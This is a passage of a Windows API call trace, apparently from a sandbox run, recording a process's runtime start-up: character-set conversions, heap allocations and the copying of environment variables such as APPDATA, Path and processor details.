\x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18e958, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0051.517] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x18f018, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ3_\x19æTó\x18", lpUsedDefaultChar=0x0) returned 256 [0051.525] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0051.525] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x431d5b) returned 0x4043b5 [0051.558] RtlSizeHeap (HeapHandle=0x240000, Flags=0x0, MemoryPointer=0x261de8) returned 0x80 [0051.571] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0051.571] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x1f) returned 0x25f260 [0051.571] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x25f260, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 31 [0051.577] GetLastError () returned 0x0 [0051.577] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x4) returned 0x261e70 [0051.577] RtlSizeHeap (HeapHandle=0x240000, Flags=0x0, MemoryPointer=0x261e70) returned 0x4 [0051.577] RtlReAllocateHeap (Heap=0x240000, Flags=0x0, Ptr=0x261e70, Size=0x8) returned 0x261e70 [0051.577] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="APPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0051.577] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x36) returned 0x261e80 [0051.577] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="APPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", cchWideChar=-1, lpMultiByteStr=0x261e80, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="APPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", lpUsedDefaultChar=0x0) returned 54 [0051.577] GetLastError () returned 0x0 [0051.583] RtlSizeHeap (HeapHandle=0x240000, Flags=0x0, MemoryPointer=0x261e70) returned 0x8 [0051.583] RtlReAllocateHeap (Heap=0x240000, Flags=0x0, Ptr=0x261e70, Size=0xc) returned 0x261ec0 [0051.583] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 55 [0051.583] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x37) returned 0x261ed8 [0051.583] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x261ed8, cbMultiByte=55, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", lpUsedDefaultChar=0x0) returned 55 [0051.583] GetLastError () returned 0x0 [0051.583] RtlSizeHeap (HeapHandle=0x240000, Flags=0x0, MemoryPointer=0x261ec0) returned 0xc [0051.583] RtlReAllocateHeap (Heap=0x240000, Flags=0x0, Ptr=0x261ec0, Size=0x10) returned 0x261ec0 [0051.583] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0051.583] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x3c) returned 0x2550b0 [0051.583] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x2550b0, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", lpUsedDefaultChar=0x0) returned 60 [0051.584] GetLastError () returned 0x0 [0051.584] RtlSizeHeap (HeapHandle=0x240000, Flags=0x0, MemoryPointer=0x261ec0) returned 0x10 [0051.584] RtlReAllocateHeap (Heap=0x240000, Flags=0x0, Ptr=0x261ec0, Size=0x14) returned 0x261f18 [0051.584] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramW6432=C:\\Program Files\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 49 [0051.584] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x31) returned 0x261f38 [0051.584] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramW6432=C:\\Program Files\\Common Files", cchWideChar=-1, lpMultiByteStr=0x261f38, cbMultiByte=49, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramW6432=C:\\Program Files\\Common Files", lpUsedDefaultChar=0x0) returned 49 [0051.584] GetLastError () returned 0x0 [0051.584] RtlSizeHeap (HeapHandle=0x240000, Flags=0x0, MemoryPointer=0x261f18) returned 0x14 [0051.584] RtlReAllocateHeap (Heap=0x240000, Flags=0x0, Ptr=0x261f18, Size=0x18) returned 0x261f18 [0051.584] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="COMPUTERNAME=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0051.584] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x17) returned 0x261f78 [0051.584] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="COMPUTERNAME=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x261f78, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="COMPUTERNAME=XDUWTFONO", lpUsedDefaultChar=0x0) returned 23 [0051.584] GetLastError () returned 0x0 [0051.584] RtlSizeHeap (HeapHandle=0x240000, Flags=0x0, MemoryPointer=0x261f18) returned 0x18 [0051.584] RtlReAllocateHeap (Heap=0x240000, Flags=0x0, Ptr=0x261f18, Size=0x1c) returned 0x261f98 [0051.584] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ComSpec=C:\\Windows\\system32\\cmd.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0051.584] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x24) returned 0x25ab80 [0051.584] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ComSpec=C:\\Windows\\system32\\cmd.exe", cchWideChar=-1, lpMultiByteStr=0x25ab80, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ComSpec=C:\\Windows\\system32\\cmd.exe", lpUsedDefaultChar=0x0) returned 36 [0051.584] GetLastError () returned 0x0 [0051.584] RtlSizeHeap (HeapHandle=0x240000, Flags=0x0, MemoryPointer=0x261f98) returned 0x1c [0051.584] RtlReAllocateHeap (Heap=0x240000, Flags=0x0, Ptr=0x261f98, Size=0x20) returned 0x261f98 [0051.584] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="FP_NO_HOST_CHECK=NO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0051.584] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x14) returned 0x261f18 [0051.584] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="FP_NO_HOST_CHECK=NO", cchWideChar=-1, lpMultiByteStr=0x261f18, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FP_NO_HOST_CHECK=NO", lpUsedDefaultChar=0x0) returned 20 [0051.584] GetLastError () returned 0x0 [0051.584] RtlSizeHeap (HeapHandle=0x240000, Flags=0x0, MemoryPointer=0x261f98) returned 0x20 [0051.584] RtlReAllocateHeap (Heap=0x240000, Flags=0x0, Ptr=0x261f98, Size=0x24) returned 0x261f98 [0051.584] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEDRIVE=C:", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0051.584] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0xd) returned 0x25e898 [0051.584] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEDRIVE=C:", cchWideChar=-1, lpMultiByteStr=0x25e898, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HOMEDRIVE=C:", lpUsedDefaultChar=0x0) returned 13 [0051.584] GetLastError () returned 0x0 [0051.584] RtlSizeHeap (HeapHandle=0x240000, Flags=0x0, MemoryPointer=0x261f98) returned 0x24 [0051.585] RtlReAllocateHeap (Heap=0x240000, Flags=0x0, Ptr=0x261f98, Size=0x28) returned 0x261f98 [0051.585] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEPATH=\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0051.585] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x25) returned 0x25abb0 [0051.585] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEPATH=\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x25abb0, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HOMEPATH=\\Users\\5p5NrGJn0jS HALPmcxz", lpUsedDefaultChar=0x0) returned 37 [0051.585] GetLastError () returned 0x0 [0051.585] RtlSizeHeap (HeapHandle=0x240000, Flags=0x0, MemoryPointer=0x261f98) returned 0x28 [0051.585] RtlReAllocateHeap (Heap=0x240000, Flags=0x0, Ptr=0x261f98, Size=0x2c) returned 0x261f98 [0051.585] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOCALAPPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 57 [0051.585] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x39) returned 0x2550f8 [0051.585] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOCALAPPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", cchWideChar=-1, lpMultiByteStr=0x2550f8, cbMultiByte=57, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LOCALAPPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", lpUsedDefaultChar=0x0) returned 57 [0051.585] GetLastError () returned 0x0 [0051.585] RtlSizeHeap (HeapHandle=0x240000, Flags=0x0, MemoryPointer=0x261f98) returned 0x2c [0051.585] RtlReAllocateHeap (Heap=0x240000, Flags=0x0, Ptr=0x261f98, Size=0x30) returned 0x261f98 [0051.585] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOGONSERVER=\\\\XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0051.585] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x18) returned 0x260a30 [0051.585] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOGONSERVER=\\\\XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x260a30, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LOGONSERVER=\\\\XDUWTFONO", lpUsedDefaultChar=0x0) returned 24 [0051.585] GetLastError () returned 0x0 [0051.585] RtlSizeHeap (HeapHandle=0x240000, Flags=0x0, MemoryPointer=0x261f98) returned 0x30 [0051.585] RtlReAllocateHeap (Heap=0x240000, Flags=0x0, Ptr=0x261f98, Size=0x34) returned 0x261f98 [0051.585] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NUMBER_OF_PROCESSORS=1", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0051.585] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x17) returned 0x260a50 [0051.585] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NUMBER_OF_PROCESSORS=1", cchWideChar=-1, lpMultiByteStr=0x260a50, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NUMBER_OF_PROCESSORS=1", lpUsedDefaultChar=0x0) returned 23 [0051.585] GetLastError () returned 0x0 [0051.585] RtlSizeHeap (HeapHandle=0x240000, Flags=0x0, MemoryPointer=0x261f98) returned 0x34 [0051.585] RtlReAllocateHeap (Heap=0x240000, Flags=0x0, Ptr=0x261f98, Size=0x38) returned 0x261f98 [0051.586] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OS=Windows_NT", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0051.586] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0xe) returned 0x25e8b0 [0051.586] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OS=Windows_NT", cchWideChar=-1, lpMultiByteStr=0x25e8b0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OS=Windows_NT", lpUsedDefaultChar=0x0) returned 14 [0051.586] GetLastError () returned 0x0 [0051.586] RtlSizeHeap (HeapHandle=0x240000, Flags=0x0, MemoryPointer=0x261f98) returned 0x38 [0051.586] RtlReAllocateHeap (Heap=0x240000, Flags=0x0, Ptr=0x261f98, Size=0x3c) returned 0x261f98 [0051.586] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 105 [0051.586] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x69) returned 0x260a70 [0051.586] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", cchWideChar=-1, lpMultiByteStr=0x260a70, cbMultiByte=105, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpUsedDefaultChar=0x0) returned 105 [0051.586] GetLastError () returned 0x0 [0051.586] RtlSizeHeap (HeapHandle=0x240000, Flags=0x0, MemoryPointer=0x261f98) returned 0x3c [0051.586] RtlReAllocateHeap (Heap=0x240000, Flags=0x0, Ptr=0x261f98, Size=0x40) returned 0x261f98 [0051.586] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0051.586] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x3e) returned 0x255140 [0051.586] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", cchWideChar=-1, lpMultiByteStr=0x255140, cbMultiByte=62, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", lpUsedDefaultChar=0x0) returned 62 [0051.586] GetLastError () returned 0x0 [0051.586] RtlSizeHeap (HeapHandle=0x240000, Flags=0x0, MemoryPointer=0x261f98) returned 0x40 [0051.586] RtlReAllocateHeap (Heap=0x240000, Flags=0x0, Ptr=0x261f98, Size=0x44) returned 0x261f98 [0051.586] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITECTURE=x86", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0051.586] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x1b) returned 0x25f288 [0051.586] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITECTURE=x86", cchWideChar=-1, lpMultiByteStr=0x25f288, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_ARCHITECTURE=x86", lpUsedDefaultChar=0x0) returned 27 [0051.586] GetLastError () returned 0x0 [0051.587] RtlSizeHeap (HeapHandle=0x240000, Flags=0x0, MemoryPointer=0x261f98) returned 0x44 [0051.587] RtlReAllocateHeap (Heap=0x240000, Flags=0x0, Ptr=0x261f98, Size=0x48) returned 0x261f98 [0051.587] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITEW6432=AMD64", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0051.587] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x1d) returned 0x25f2b0 [0051.587] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITEW6432=AMD64", cchWideChar=-1, lpMultiByteStr=0x25f2b0, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_ARCHITEW6432=AMD64", lpUsedDefaultChar=0x0) returned 29 [0051.587] GetLastError () returned 0x0 [0051.587] RtlSizeHeap (HeapHandle=0x240000, Flags=0x0, MemoryPointer=0x261f98) returned 0x48 [0051.587] RtlReAllocateHeap (Heap=0x240000, Flags=0x0, Ptr=0x261f98, Size=0x4c) returned 0x260ae8 [0051.587] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 4, GenuineIntel", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 72 [0051.587] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x48) returned 0x256d80 [0051.587] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 4, GenuineIntel", cchWideChar=-1, lpMultiByteStr=0x256d80, cbMultiByte=72, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 4, GenuineIntel", lpUsedDefaultChar=0x0) returned 72 [0051.587] GetLastError () returned 0x0 [0051.587] RtlSizeHeap (HeapHandle=0x240000, Flags=0x0, MemoryPointer=0x260ae8) returned 0x4c [0051.587] RtlReAllocateHeap (Heap=0x240000, Flags=0x0, Ptr=0x260ae8, Size=0x50) returned 0x260ae8 [0051.587] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_LEVEL=6", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0051.587] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x12) returned 0x261f98 [0051.587] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_LEVEL=6", cchWideChar=-1, lpMultiByteStr=0x261f98, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_LEVEL=6", lpUsedDefaultChar=0x0) returned 18 [0051.587] GetLastError () returned 0x0 [0051.587] RtlSizeHeap (HeapHandle=0x240000, Flags=0x0, MemoryPointer=0x260ae8) returned 0x50 [0051.587] RtlReAllocateHeap (Heap=0x240000, Flags=0x0, Ptr=0x260ae8, Size=0x54) returned 0x260ae8 [0051.587] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_REVISION=5504", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0051.587] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x18) returned 0x261fb8 [0051.587] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_REVISION=5504", cchWideChar=-1, lpMultiByteStr=0x261fb8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_REVISION=5504", lpUsedDefaultChar=0x0) returned 24 [0051.588] GetLastError () returned 0x0 [0051.588] 